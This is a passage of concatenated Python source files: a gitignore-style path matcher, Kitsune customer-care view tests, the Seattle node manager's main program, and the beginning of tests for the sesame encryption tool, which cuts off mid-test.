file.""" return (len(self.parts) == 1 and fnmatch.fnmatch(name, self.parts[0])) def __str__(self): pat = '/'.join(self.parts) return '/' + pat if self.rooted else pat @classmethod def parse(class_, string): directory = string.endswith('/') rooted = string.startswith('/') parts = [part for part in string.split('/') if part] if directory: parts.append('') return class_(rooted, parts) @staticmethod def match_part(fname, pattern): raise NotImplementedError('PathPattern.match_part') class LiteralPattern(PathPattern): @staticmethod def match_part(fname, pattern): return fname == pattern class GlobPattern(PathPattern): @staticmethod def match_part(fname, pattern): return fnmatch.fnmatch(fname, pattern) class PatternSet(object): """A set of positive and negative patterns.""" __slots__ = ['patterns'] def __init__(self, patterns=()): npatterns = [] for positive, pattern in patterns: if npatterns or positive: npatterns.append((positive, pattern)) self.patterns = tuple(npatterns) def __nonzero__(self): return bool(self.patterns) def match_dir(self, name): """Apply the pattern set against a directory. Returns (match, patternset), where "match" is true if the directory itself matches the pattern, and "patternset" is a new patternset relative to the directory. 
""" dir_patterns = [] dir_match = False for positive, pattern in self.patterns: pat_match, pat_patterns = pattern.match_dir(name) dir_patterns.extend( (positive, pat_pattern) for pat_pattern in pat_patterns) if pat_match: dir_match = positive return dir_match, PatternSet(dir_patterns) def match_file(self, name): """Determine whether this pattern set matches a file.""" result = False for positive, pattern in self.patterns: if result != positive and pattern.match_file(name): result = positive return result def union(self, other): """Compute the union of two PatternSet objects.""" if not self.patterns: return other if not other.patterns: return self return PatternSet(self.patterns, other.patterns) @classmethod def parse(class_, strings): """Make a pattern set by parsing a list of strings as patterns.""" patterns = [] for string in strings: if string.startswith('!'): positive = False string = string[1:] if not string: continue else: positive = True patterns.append((positive, GlobPattern.parse(string))) return class_(patterns) @classmethod def read(class_, fp): """Make a pattern set by parsing patterns from a file. This tries to use the same syntax as gitignore files. """ patterns = [] for line in fp: line = line.strip() if not line or line.startswith('#'): continue if line.startswith('!'): positive = False line = line[1:] else: positive = True patterns.append((positive, GlobPattern.parse(line))) return class_(patterns) def dump(self): print 'Patterns:' for positive, pattern in self.patterns: print ' {}{}'.format('' if positive else '!', str(pattern)) def match_path(self, path): """Test whether the pattern set matches a full path.""" parts = [part for part in path.split('/') if part] if path.endswith('/'): fname = None else: parts, fname = parts[:-1], parts[-1] patternset = self for dirname in parts: match, patternset = patternset.match_dir(dirname) if match: return True if not patternset: return False if fname is not None: return patternset.match_file(fname) return False if __name__ == '__main__': p = PatternSet.parse([ 'fname', '*.c', '!*.yy.c', 'subdir/*.h', '!*.yy.h', '/rooted/x/y', 'unrooted/x/y', '/rooted/x/*.py', 'unrooted/x/*.py', 'subdir/', '/rooted-subdir/', ]) checks = [ ('fname', True), ('abc.c', True), ('abc/def.c', True), ('abc.yy.c', False), ('abc/def.yy.c', False), ('fname/xyz', True), ('fname/abc.yy.c', True), ('rooted', False), ('rooted/x', False), ('rooted/x/y', True), ('rooted/x/z', False), ('rooted/x/file.py', True), ('rooted/x/y/z', True), ('a/rooted', False), ('a/rooted/x', False), ('a/rooted/x/y', False), ('a/rooted/x/z', False), ('a/rooted/x/file.py', False), ('a/rooted/x/y/z', False), ('subdir', False), ('subdir/', True), ('subdir/x', True), ('x/subdir', False), ('x/subdir/', True), ('x/subdir/x', True), ('rooted-subdir', False), ('rooted-subdir/', True), ('rooted-subdir/x', True), ('x/rooted-subdir', False), ('x/rooted-subdir/', False), ('x/rooted-subdir/x', False), ] for path, match in checks: if p.match_path(path) != match: raise Exception( 'Expected match={} for path={}'.format(match, path)) print 'Test passed'
from datetime import datetime, timedelta import json from django.conf import settings from mock import patch, Mock from nose.tools import eq_ from test_utils import RequestFactory from kitsune.customercare.models import Tweet, Reply from kitsune.customercare.tests import tweet, twitter_account, reply from kitsune.customercare.views import _get_tweets, _count_answered_tweets from kitsune.customercare.views import twitter_post from kitsune.sumo.tests import TestCase, LocalizingClient from kitsune.sumo.urlresolvers import reverse from kitsune.users.tests import user class TweetListTests(TestCase): """Tests for the customer care tweet list.""" def setUp(self): for i in range(0, 11): tweet(save=True) now = datetime.now() # Create a tweet older than CC_TWEETS_DAYS days older = now - timedelta(days=settings.CC_TWEETS_DAYS) tweet(save=True, created=older) # Create a tweet on the last CC_TWEETS_DAYS day last = now - timedelta(days=settings.CC_TWEETS_DAYS - 1) tweet(save=True, created=last) self.client.login(username=user(save=True), password='testpass') def _hide_tweet(self, id): url = reverse('customercare.hide_tweet', locale='en-US') return self.client.post(url, {'id': id}) def test_limit(self): """Do not return more than LIMIT tweets.""" tweets = _get_tweets(limit=2) eq_(len(tweets), 2) def test_newer_tweets_only(self): """Ensure that only tweets from the last CC_TWEETS_DAYS are shown""" tweets = _get_tweets() eq_(len(tweets), 12) def test_max_id(self): """Ensure max_id offset works.""" tweets_1 = _get_tweets() assert tweets_1 # Select max_id from the first list max_id = tweets_1[3]['id'] tweets_2 = _get_tweets(max_id=max_id) assert tweets_2 # Make sure this id is not in the result, and all tweets are # older than max_id. for t in tweets_2: assert t['id'] < max_id def test_hide_tweets(self): """Try hiding tweets.""" tw = Tweet.objects.filter(reply_to=None, hidden=False)[0] r = self._hide_tweet(tw.tweet_id) eq_(r.status_code, 200) # Re-fetch from database. Should be hidden. tw = Tweet.objects.get(tweet_id=tw.tweet_id) eq_(tw.hidden, True) # Hiding it again should work. r = self._hide_tweet(tw.tweet_id) eq_(r.status_code, 200) def test_hide_tweets_with_replies(self): """Hiding tweets with replies is not allowed.""" tw = tweet(save=True) reply_tw = tweet(save=True) reply_tw.reply_to_id = tw.tweet_id reply_tw.save() r = self.client.post( reverse('customercare.hide_tweet', locale='en-US'), {'id': tw.tweet_id}) eq_(r.status_code, 400) def test_hide_tweets_invalid_id(self): """Invalid tweet IDs shouldn't break anything.""" r = self._hide_tweet(123) eq_(r.status_code, 404) r = self._hide_tweet('cheesecake') eq_(r.status_code, 400) @patch.object(settings._wrapped, 'CC_ALLOW_REMOVE', False) def test_hide_tweets_disabled(self): """Do not allow hiding tweets if feature is disabled.""" tw = Tweet.objects.filter(reply_to=None)[0] r = self.client.post( reverse('customercare.hide_tweet', locale='en-US'), {'id': tw.tweet_id}) eq_(r.status_code, 418) # Don't tell a teapot to brew coffee. 
class CountTests(TestCase): def test_count_replies(self): """Test filtering when counting tweets""" tweet(save=True) id = Tweet.latest().tweet_id reply(reply_to_tweet_id=id, created=datetime.now(), save=True) reply(reply_to_tweet_id=id, created=datetime.now(), save=True) reply(created=datetime.now() - timedelta(days=1, minutes=1), save=True) yesterday = datetime.now() - timedelta(days=1) count_recent_answered = _count_answered_tweets(since=yesterday) eq_(count_recent_answered, 1) class FilterTestCase(TestCase): client_class = LocalizingClient def _tweet_list(self, filter): """Return the content of async-fetched tweet list. Also, assert the request returns a 200. """ response = self.client.get( reverse('customercare.more_tweets'), {'filter': filter}) eq_(response.status_code, 200) return response.content class FilterTests(FilterTestCase): """Test tweet filtering""" def setUp(self): """Set up FilterTests Make a tweet, an answer to it, an unanswered tweet, and a hidden one. """ super(FilterTests, self).setUp() tweet(text='YO_UNANSWERED').save() cry_for_help = tweet(text='YO_HELP_ME', save=True) tweet(text='YO_REPLY', reply_to=cry_for_help).save() tweet(text='YO_HIDDEN', hidden=True).save() def _test_a_filter(self, filter, should_show_unanswered, should_show_answered, should_show_reply, should_show_hidden): """Ensure the given filter shows the tweets specified.""" content = self._tweet_list(filter) assert ('YO_UNANSWERED' in content) == should_show_unanswered assert ('YO_HELP_ME' in content) == should_show_answered assert ('YO_REPLY' in content) == should_show_reply assert ('YO_HIDDEN' in content) == should_show_hidden def test_unanswered(self): self._test_a_filter('unanswered', True, False, False, False) def test_answered(self): self._test_a_filter('answered', False, True, True, False) def test_all(self): self._test_a_filter('all', True, True, True, True) def test_recent(self): self._test_a_filter('recent', True, True, True, False) def test_bogus(self): """Test a bogus filter, which should fall back to Recent.""" self._test_a_filter('bogus', True, True, True, False) class FilterCachingTests(FilterTestCase): """Test interaction of caching with filters""" def test_caching(self): """Refiltering list after replying shows replied-to tweet""" # We need at least one existing answer to get the list of answered # tweets to cache: question = tweet(save=True) tweet(reply_to=question).save() # Make a sad, sad, unanswered tweet: cry_for_help = tweet(text='YO_UNANSWERED', save=True) # Cache the list of answered tweets: self._tweet_list('answered') # Reply to the lonely tweet: tweet(text='YO_REPLY', reply_to=cry_for_help).save() # And make sure we can immediately see that we replied: assert 'YO_UNANSWERED' in self._tweet_list('answered') class TweetReplyTests(TestCase): """Test for the twitter_post view.""" client_class = LocalizingClient def _create_mocked_tweet_request(self): request = RequestFactory().post( reverse('customercare.twitter_post'), {'reply_to': 1, 'content': '@foobar try Aurora! #fxhelp'}) request.session = {} request.twitter = Mock() request.twitter.authed = True request.twitter.api = Mock() return_value = { 'id': 123456790, 'text': '@foobar try Aurora! 
#fxhelp', 'created_at': datetime.strftime(datetime.utcnow(), '%a %b %d %H:%M:%S +0000 %Y'), 'user': { 'lang': 'en', 'id': 42, 'screen_name': 'r1cky', 'profile_image_url': 'http://example.com/profile.jpg', 'profile_image_url_https': 'https://example.com/profile.jpg', } } request.twitter.api.update_status.return_value = return_value credentials = {'screen_name': 'r1cky'} request.twitter.api.verify_credentials.return_value = credentials request.user = user(save=True) return request def test_post_reply(self): # Create a Tweet to reply to. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a request and mock all the required properties and methods. request = RequestFactory().post( reverse('customercare.twitter_post'), {'reply_to': 1, 'content': '@foobar try Aurora! #fxhelp'}) request.session = {} request.twitter = Mock() request.twitter.authed = True request.twitter.api = Mock() return_value = { 'id': 123456790, 'text': '@foobar try Aurora! #fxhelp', 'created_at': datetime.strftime(datetime.utcnow(), '%a %b %d %H:%M:%S +0000 %Y'), 'user': { 'lang': 'en', 'id': 42, 'screen_name': 'r1cky', 'profile_image_url': 'http://example.com/profile.jpg', 'profile_image_url_https': 'https://example.com/profile.jpg', } } request.twitter.api.update_status.return_value = return_value credentials = {'screen_name': 'r1cky'} request.twitter.api.verify_credentials.return_value = credentials request.user = user(save=True) # Pass the request to the view and verify response. response = twitter_post(request) eq_(200, response.status_code) # Verify the reply was inserted with the right data. reply = Reply.objects.all()[0] eq_('r1cky', reply.twitter_username) eq_(1, reply.reply_to_tweet_id) eq_('@foobar try Aurora! #fxhelp', json.loads(reply.raw_json)['text']) def test_prevent_multiple_replies(self): t = tweet(save=True) eq_(t.replies.count(), 0) tweet(reply_to=t, save=True) eq_(t.replies.count(), 1) self.client.login(username=user(save=True).username, password='testpass') response = self.client.post( reverse('customercare.twitter_post'), {'reply_to': 1, 'content': '@foobar try Aurora! #fxhelp'}) eq_(response.status_code, 400) eq_(t.replies.count(), 1) def test_post_account_banned(self): # Create a tweet so our request matches. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a banned TwitterAccoun twitter_account(username='r1cky', banned=True, save=True) # Create a request and mock all the required properties and methods. request = self._create_mocked_tweet_request() twitter_post(request) eq_(request.twitter.api.update_status.called, False) def test_post_account_not_banned(self): # Create a tweet so our request matches. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a valid TwitterAccount twitter_account(username='r1cky', banned=False, save=True) # Create a request and mock all the required properties and methods. request = self._create_mocked_tweet_request() twitter_post(request) eq_(request.twitter.api.update_status.called, True) def test_post_account_not_exists(self): # Create a tweet so our request matches. Tweet.objects.create( pk=1, raw_json='{}', locale='en', created=datetime.now()) # Create a request and mock all the required properties and methods. request = self._create_mocked_tweet_request() twitter_post(request) eq_(request.twitter.api.update_status.called, True)
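

def _example_mock_twitter_wiring():
    """Hedged illustration (not part of the original suite) of the Mock
    wiring used by _create_mocked_tweet_request above: attribute access on a
    Mock auto-creates child mocks, and return_value fixes what a call like
    update_status() hands back. The payload is made up and the function is
    not collected as a test; call it manually if curious.
    """
    twitter = Mock()
    twitter.authed = True
    twitter.api.update_status.return_value = {'id': 1, 'text': 'hi'}

    result = twitter.api.update_status('hi')

    eq_(result['text'], 'hi')
    assert twitter.api.update_status.called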
""" Author: Justin Cappos Modified by Brent Couvrette to make use of circular logging. Modified by Eric Kimbrel to add NAT traversal Module: Node Manager main program. It initializes the other modules and doesn't do much else. Start date: September 3rd, 2008 This is the node manager for Seattle. It ensures that sandboxes are correctly assigned to users and users can manipulate those sandboxes safely. The design goals of this version are to be secure, simple, and reliable (in that order). The node manager has several different threads. An advertisement thread (nmadverise) that inserts entries into OpenDHT so that users and owners can locate their vessels. A status thread (nmstatusmonitor) that checks the status of vessels and updates statuses in the table used by the API. An accepter (nmconnectionmanager) listens for connections (preventing simple attacks) and puts them into a list. A worker thread (used in the nmconnectionmanager, nmrequesthandler, nmAPI) handles enacting the appropriate actions given requests from the user. The main thread initializes the other threads and monitors them to ensure they do not terminate prematurely (restarting them as necessary). """ # Let's make sure the version of python is supported import checkpythonversion checkpythonversion.ensure_python_version_is_supported() import os import sys import daemon import optparse import repyhelper #used to bring in NAT Layer # I need to make a cachedir for repyhelper... if not os.path.exists('nodemanager.repyhelpercache'): os.mkdir('nodemanager.repyhelpercache') # prepend this to my python path sys.path = ['nodemanager.repyhelpercache'] + sys.path repyhelpercachedir = repyhelper.set_importcachedir('nodemanager.repyhelpercache') # Armon: Prevent all warnings import warnings # Ignores all warnings warnings.simplefilter("ignore") from repyportability import * import time import threading import nmadvertise import nmstatusmonitor # Needed for use of the status monitor thread: import nmAPI import nmconnectionmanager # need to initialize the name, key and version (for when we return information # about us). Also we need the dictionary of vessel state so that the threads # can update / read it. import nmrequesthandler import persist import misc import runonce # for getruntime... import nonportable # for harshexit import harshexit import traceback import servicelogger repyhelper.translate_and_import('sha.repy') repyhelper.translate_and_import('rsa.repy') repyhelper.translate_and_import('ShimStackInterface.py') # Armon: To handle user preferrences with respect to IP's and Interfaces # I will re-use the code repy uses in emulcomm import emulcomm # One problem we need to tackle is should we wait to restart a failed service # or should we constantly restart it. For advertisement and status threads, # I've chosen to wait before restarting... For worker and accepter, I think # it's essential to keep restarting them as often as we can... # # these variables help us to track when we've started and whether or not we # should restart # the last time the thread was started thread_starttime = {} # the time I should wait thread_waittime = {} # never wait more than 5 minutes maxwaittime = 300.0 # or less than 2 seconds minwaittime = 2.0 # multiply by 1.5 each time... wait_exponent = 1.5 # and start to decrease only after a reasonable run time... 
reasonableruntime = 30 # and drop by decreaseamount = .5 # log a liveness message after this many iterations of the main loop LOG_AFTER_THIS_MANY_ITERATIONS = 600 # every 10 minutes # BUG: what if the data on disk is corrupt? How do I recover? What is the # "right thing"? I could run nminit again... Is this the "right thing"? version = "0.1t" # Our settings configuration = {} # Lock and condition to determine if the accepter thread has started accepter_state = {'lock':getlock(),'started':False} default_shim = '(NatDeciderShim)' FOREGROUND = False NAME_SERVER = "zenodotus.cs.washington.edu" # Number of seconds that our DNS record should live on the DNS server. DNS_CACHE_TTL = 600 # Weather or not to run the nodemanager in test mode TEST_NM = False # Dict to hold up-to-date nodename and boolean flags to track when to reset # advertisement and accepter threads (IP mobility) # If not behind NAT, name is node's IP:port # If behind a NAT, name is a string of the form NAT$UNIQUE_ID:port node_reset_config = { 'name': None, 'reset_advert': False, 'reset_accepter': False } # Initializes emulcomm with all of the network restriction information # Takes configuration, which the the dictionary stored in nodeman.cfg def initialize_ip_interface_restrictions(configuration): # Armon: Check if networking restrictions are enabled, appropriately generate the list of usable IP's # If any of our expected entries are missing, assume that restrictions are not enabled if 'networkrestrictions' in configuration and 'nm_restricted' in configuration['networkrestrictions'] \ and configuration['networkrestrictions']['nm_restricted'] and 'nm_user_preference' in configuration['networkrestrictions']: # Setup emulcomm to generate an IP list for us, setup the flags emulcomm.user_ip_interface_preferences = True # Add the specified IPs/Interfaces emulcomm.user_specified_ip_interface_list = configuration['networkrestrictions']['nm_user_preference'] # has the thread started? def should_start_waitable_thread(threadid, threadname): # first time! Let's init! if threadid not in thread_starttime: thread_waittime[threadid] = minwaittime thread_starttime[threadid] = 0.0 # If asking about advert thread and node_reset_config specifies to reset it, # then return True if threadid == 'advert' and node_reset_config['reset_advert']: # Before returning, turn off the reset flag node_reset_config['reset_advert'] = False return True # If it has been started, and the elapsed time is too short, always return # False to say it shouldn't be restarted if thread_starttime[threadid] and nonportable.getruntime() - thread_starttime[threadid] < thread_waittime[threadid]: return False for thread in threading.enumerate(): if threadname in str(thread): # running now. If it's run for a reasonable time, let's reduce the # wait time... if nonportable.getruntime() - thread_starttime[threadid] > reasonableruntime: thread_waittime[threadid] = max(minwaittime, thread_waittime[threadid]-decreaseamount) return False else: return True # this is called when the thread is started... def started_waitable_thread(threadid): thread_starttime[threadid] = nonportable.getruntime() thread_waittime[threadid] = min(maxwaittime, thread_waittime[threadid] ** wait_exponent) # has the thread started? 
def is_accepter_started(): accepter_state['lock'].acquire() result = accepter_state['started'] accepter_state['lock'].release() return result def start_accepter(): unique_id = rsa_publickey_to_string(configuration['publickey']) unique_id = sha_hexhash(unique_id) + str(configuration['service_vessel']) unique_id += "." + NAME_SERVER # do this until we get the accepter started... while True: if not node_reset_config['reset_accepter'] and is_accepter_started(): # we're done, return the name! return myname else: for possibleport in configuration['ports']: try: servicelogger.log("[INFO]: Trying to wait") # We advertise the unique_id first so that we can perform waitforconn # on it later. It's tempting to do a waitforconn directly on the # current IP, but IPs are not unique. If we are behind a NAT, our IP # can be some private address which may have duplicates registered in # the NAT forwarder. As a result, a client may not be able to locate # us within the NAT forwarder. Hence, waitforconn must occur on a unique # resolvable name. advertise_to_DNS(unique_id) timeout_waitforconn(unique_id, possibleport, nmconnectionmanager.connection_handler, timeout=10, use_shim=True, shim_string=default_shim) except Exception, e: servicelogger.log("[ERROR]: when calling waitforconn for the connection_handler: " + str(e)) servicelogger.log_last_exception() else: # the waitforconn was completed so the accepter is started accepter_state['lock'].acquire() accepter_state['started']= True accepter_state['lock'].release() # assign the nodemanager name myname = unique_id + ":" + str(possibleport) servicelogger.log("[INFO]: Now listening as " + myname) break else: servicelogger.log("[ERROR]: cannot find a port for waitforconn.") # Saves myname to a file so that unit test programs can connect to me using shim's naming system advertised_name_file_obj = open('advertised_name', 'w') advertised_name_file_obj.write(myname) advertised_name_file_obj.close() # check infrequently time.sleep(configuration['pollfrequency']) # has the thread started? def is_worker_thread_started(): for thread in threading.enumerate(): if 'WorkerThread' in str(thread): return True else: return False def start_worker_thread(sleeptime): if not is_worker_thread_started(): # start the WorkerThread and set it to a daemon. I think the daemon # setting is unnecessary since I'll clobber on restart... workerthread = nmconnectionmanager.WorkerThread(sleeptime) workerthread.setDaemon(True) workerthread.start() # has the thread started? def is_advert_thread_started(): for thread in threading.enumerate(): if 'Advertisement Thread' in str(thread): return True else: return False def start_advert_thread(vesseldict, myname, nodekey): if should_start_waitable_thread('advert','Advertisement Thread'): # start the AdvertThread and set it to a daemon. I think the daemon # setting is unnecessary since I'll clobber on restart... advertthread = nmadvertise.advertthread(vesseldict, nodekey) nmadvertise.myname = myname advertthread.setDaemon(True) advertthread.start() started_waitable_thread('advert') def is_status_thread_started(): for thread in threading.enumerate(): if 'Status Monitoring Thread' in str(thread): return True else: return False def start_status_thread(vesseldict,sleeptime): if should_start_waitable_thread('status','Status Monitoring Thread'): # start the StatusThread and set it to a daemon. I think the daemon # setting is unnecessary since I'll clobber on restart... 
statusthread = nmstatusmonitor.statusthread(vesseldict, sleeptime, nmAPI) statusthread.setDaemon(True) statusthread.start() started_waitable_thread('status') def advertise_to_DNS(unique_id): """ Advertise unique_id to the zenodotus DNS server. We strip away whatever that follows the NAME_SERVER part of the unique_id. For instance, if our unique_id is abc.NAME_SERVER:1234@xyz, then we only advertise abc.NAME_SERVER. """ # IP that maps to the unique_id myip = emulcomm.getmyip() # Extract the part of unique_id up to the name server, # i.e. xyz.zenodotus.washington.edu, and discard whatever that follows name_server_pos = unique_id.find(NAME_SERVER) if name_server_pos > -1: unique_id = unique_id[0 : name_server_pos + len(NAME_SERVER)] else: raise Exception("Invalid unique_id format: '" + str(unique_id) + "'") advertise_success = False # We keep trying until successful advertisement (Fix for Ticket #956) while not advertise_success: try: advertise_announce(unique_id, myip, DNS_CACHE_TTL) servicelogger.log("[INFO]: Advertised " + str(unique_id) + " which maps to " + myip) advertise_success = True except Exception, error: if 'announce error' in str(error): # We can confidently drop the exception here. The advertisement service # can sometimes be flaky, yet it can guarantee advertisement of our # key-value pair on at least one of the three components. Thus, we are # printing the error message as a warning here. advertise_success = True else: advertise_success = False # lots of little things need to be initialized... def main(): global configuration if not FOREGROUND: # Background ourselves. daemon.daemonize() # Check if we are running in testmode. if TEST_NM: nodemanager_pid = os.getpid() servicelogger.log("[INFO]: Running nodemanager in test mode on port <nodemanager_port>, "+ "pid %s." % str(nodemanager_pid)) nodeman_pid_file = open(os.path.join(os.getcwd(), 'nodemanager.pid'), 'w') # Write out the pid of the nodemanager process that we started to a file. # This is only done if the nodemanager was started in test mode. try: nodeman_pid_file.write(str(nodemanager_pid)) finally: nodeman_pid_file.close() else: # ensure that only one instance is running at a time... gotlock = runonce.getprocesslock("seattlenodemanager") if gotlock == True: # I got the lock. All is well... pass else: if gotlock: servicelogger.log("[ERROR]:Another node manager process (pid: " + str(gotlock) + ") is running") else: servicelogger.log("[ERROR]:Another node manager process is running") return # I'll grab the necessary information first... servicelogger.log("[INFO]:Loading config") # BUG: Do this better? Is this the right way to engineer this? configuration = persist.restore_object("nodeman.cfg") # Armon: initialize the network restrictions initialize_ip_interface_restrictions(configuration) # ZACK BOKA: For Linux and Darwin systems, check to make sure that the new # seattle crontab entry has been installed in the crontab. # Do this here because the "nodeman.cfg" needs to have been read # into configuration via the persist module. if nonportable.ostype == 'Linux' or nonportable.ostype == 'Darwin': if 'crontab_updated_for_2009_installer' not in configuration or \ configuration['crontab_updated_for_2009_installer'] == False: try: import update_crontab_entry modified_crontab_entry = \ update_crontab_entry.modify_seattle_crontab_entry() # If updating the seattle crontab entry succeeded, then update the # 'crontab_updated_for_2009_installer' so the nodemanager no longer # tries to update the crontab entry when it starts up. 
if modified_crontab_entry: configuration['crontab_updated_for_2009_installer'] = True persist.commit_object(configuration,"nodeman.cfg") except Exception,e: exception_traceback_string = traceback.format_exc() servicelogger.log("[ERROR]: The following error occured when " \ + "modifying the crontab for the new 2009 " \ + "seattle crontab entry: " \ + exception_traceback_string) # get the external IP address... myip = None while True: try: # Try to find our external IP. myip = emulcomm.getmyip() except Exception, e: # If we aren't connected to the internet, emulcomm.getmyip() raises this: if len(e.args) >= 1 and e.args[0] == "Cannot detect a connection to the Internet.": # So we try again. pass else: # It wasn't emulcomm.getmyip()'s exception. re-raise. raise else: # We succeeded in getting our external IP. Leave the loop. break time.sleep(0.1) vesseldict = nmrequesthandler.initialize(myip, configuration['publickey'], version) # Start accepter... myname = start_accepter() # Initialize the global node name inside node reset configuration dict node_reset_config['name'] = myname #send our advertised name to the log servicelogger.log('myname = '+str(myname)) # Start worker thread... start_worker_thread(configuration['pollfrequency']) # Start advert thread... start_advert_thread(vesseldict, myname, configuration['publickey']) # Start status thread... start_status_thread(vesseldict,configuration['pollfrequency']) # we should be all set up now. servicelogger.log("[INFO]:Started") # I will count my iterations through the loop so that I can log a message # periodically. This makes it clear I am alive. times_through_the_loop = 0 last_advertise_to_DNS_time = time.time() # BUG: Need to exit all when we're being upgraded while True: # E.K Previous there was a check to ensure that the accepter # thread was started. There is no way to actually check this # and this code was never executed, so i removed it completely myname = node_reset_config['name'] # Refresh the DNS cache if the duration from when we last advertised is # longer than half of the TTL. This guarantees we advertise our name before # it expires in the DNS cache. if 2 * (time.time() - last_advertise_to_DNS_time) > DNS_CACHE_TTL: advertise_to_DNS(myname) last_advertise_to_DNS_time = time.time() if not is_worker_thread_started(): servicelogger.log("[WARN]:At " + str(time.time()) + " restarting worker...") start_worker_thread(configuration['pollfrequency']) if should_start_waitable_thread('advert','Advertisement Thread'): servicelogger.log("[WARN]:At " + str(time.time()) + " restarting advert...") start_advert_thread(vesseldict, myname, configuration['publickey']) if should_start_waitable_thread('status','Status Monitoring Thread'): servicelogger.log("[WARN]:At " + str(time.time()) + " restarting status...") start_status_thread(vesseldict,configuration['pollfrequency']) if not TEST_NM and not runonce.stillhaveprocesslock("seattlenodemanager"): servicelogger.log("[ERROR]:The node manager lost the process lock...") harshexit.harshexit(55) # Check for ip change. current_ip = None while True: try: current_ip = emulcomm.getmyip() except Exception, e: # If we aren't connected to the internet, emulcomm.getmyip() raises this: if len(e.args) >= 1 and e.args[0] == "Cannot detect a connection to the Internet.": # So we try again. pass else: # It wasn't emulcomm.getmyip()'s exception. re-raise. raise else: # We succeeded in getting our external IP. Leave the loop. break time.sleep(0.1) # If ip has changed, then restart the advertisement and accepter threads. 
if current_ip != myip: servicelogger.log('[WARN]:At ' + str(time.time()) + ' node ip changed...') myip = current_ip # Restart the accepter thread and update nodename in node_reset_config node_reset_config['reset_accepter'] = True myname = start_accepter() node_reset_config['name'] = myname # Restart the advertisement thread node_reset_config['reset_advert'] = True start_advert_thread(vesseldict, myname, configuration['publickey']) time.sleep(configuration['pollfrequency']) # if I've been through the loop enough times, log this... times_through_the_loop = times_through_the_loop + 1 if times_through_the_loop % LOG_AFTER_THIS_MANY_ITERATIONS == 0: servicelogger.log("[INFO]: node manager is alive...") def parse_arguments(): """ Parse all the arguments passed in through the command line for the nodemanager. This way in the future it will be easy to add and remove options from the nodemanager. """ # Create the option parser parser = optparse.OptionParser(version="Seattle " + version) # Add the --foreground option. parser.add_option('--foreground', dest='foreground', action='store_true', default=False, help="Run the nodemanager in foreground " + "instead of daemonizing it.") # Add the --test-mode optino. parser.add_option('--test-mode', dest='test_mode', action='store_true', default=False, help="Run the nodemanager in test mode.") # Add the using shim capability. # --shims [shim name]: Forces use of the specified shims. The shim name must # conform to the format as specified in: # https://seattle.cs.washington.edu/wiki/UsingShims. parser.add_option('--shims', type="string", dest="shim_name", help="Use a user specified shim instead of the" + " default (NatDeciderShim)") # Parse the argumetns. options, args = parser.parse_args() # Set some global variables. global FOREGROUND global TEST_NM global default_shim # Analyze the options if options.foreground: FOREGROUND = True if options.test_mode: TEST_NM = True if options.shim_name: servicelogger.log("[INFO]: Using user-specified shims " + options.shim_name) default_shim = options.shim_name if __name__ == '__main__': """ Start up the nodemanager. We are going to setup the servicelogger, then parse the arguments and then start everything up. """ # Initialize the service logger. We need to do this before calling main # because we want to print exceptions in main to the service log servicelogger.init('nodemanager') # Parse the arguments passed in the command line to set # different variables. parse_arguments() # Armon: Add some logging in case there is an uncaught exception try: main() except Exception,e: # If the servicelogger is not yet initialized, this will not be logged. servicelogger.log_last_exception() # Since the main thread has died, this is a fatal exception, # so we need to forcefully exit harshexit.harshexit(15)
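

# ----------------------------------------------------------------------------
# Hedged illustration (not part of the original program): the restart backoff
# applied by started_waitable_thread() raises the per-thread wait time to the
# wait_exponent power and caps it at maxwaittime. The helper below replays
# that arithmetic on the module constants; the node manager never calls it.
def _demo_restart_backoff(steps=8):
  waittime = minwaittime
  schedule = []
  for _ in range(steps):
    schedule.append(waittime)
    waittime = min(maxwaittime, waittime ** wait_exponent)
  return schedule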
import collections import mock import os import shutil import tempfile import time import uuid from sesame.core import decrypt from sesame.core import encrypt from sesame.utils import create_key from sesame.utils import make_secure_temp_directory from utils import cd from utils import mkdir_p from utils import delete_path class TestSesame(object): def setup(self): """ Create a working directory and some test files """ self.working_dir = tempfile.mkdtemp() self.file_contents = collections.OrderedDict.fromkeys([ 'file.test', '1/file.test', '2/2/file.test', ]) self.file_timestamps = self.file_contents.copy() # create a key for the tests self.key = create_key(None, write=False) # setup files in subdirectory for path in self.file_contents.keys(): # create file content self.file_contents[path] = str(uuid.uuid4()) abspath = os.path.join(self.working_dir, path) # create subdirs as necessary mkdir_p(os.path.dirname(abspath)) # create test file in dir with open(abspath, 'w') as f: f.write(self.file_contents[path]) # record file creation time self.file_timestamps[path] = os.stat(abspath).st_ctime def teardown(self): """ Destroy working directory """ shutil.rmtree(self.working_dir) def testcreate_key(self): pass def test_single_relative(self): """ Simple auto-gen key; relative paths; deletes source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # delete the source file os.remove(test_file_path) # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # ensure file has been created assert os.path.exists(test_file_path) # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_relative_force(self): """ Simple auto-gen key; relative paths; with force flag to overwrite source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse force=True, ) # ensure file has been overwritten assert self.file_timestamps[test_file_path] < os.stat(test_file_path).st_ctime # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_relative_overwrite_true(self): """ Simple auto-gen key; relative paths; answer yes to overwrite the source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file; mock responds yes to overwrite the existing file with mock.patch('__builtin__.raw_input', return_value='y'): decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # ensure file has been overwritten assert self.file_timestamps[test_file_path] < os.stat(test_file_path).st_ctime # verify decrypted contents with open(test_file_path, 'r') as f: assert 
